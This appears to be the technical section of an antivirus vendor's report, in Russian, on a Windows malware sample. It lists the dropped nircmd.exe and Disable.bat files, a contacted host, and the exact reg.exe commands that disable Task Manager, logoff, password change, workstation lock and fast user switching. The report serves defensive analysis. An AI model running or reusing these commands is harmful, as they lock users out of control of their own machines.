Техническая информация
- Блокирует отображение скрытых файлов
- Блокирует отображение расширений файлов
- Блокирует запуск Диспетчера задач (Taskmgr)
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogoff' = '00000001'
- %WINDIR%\nircmd.exe
- %WINDIR%\disable.bat
- 't1.##umcdn.net':443
- 't1.##umcdn.net':443
- DNS ASK t1.##umcdn.net
- ClassName: 'Progman' WindowName: 'Program Manager'
- ClassName: 'Button' WindowName: 'Start'
- ClassName: '' WindowName: 'Start'
- '%WINDIR%\nircmd.exe' exec hide %WINDIR%\Disable.bat
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\Disable.bat (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\Disable.bat
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d "1" /f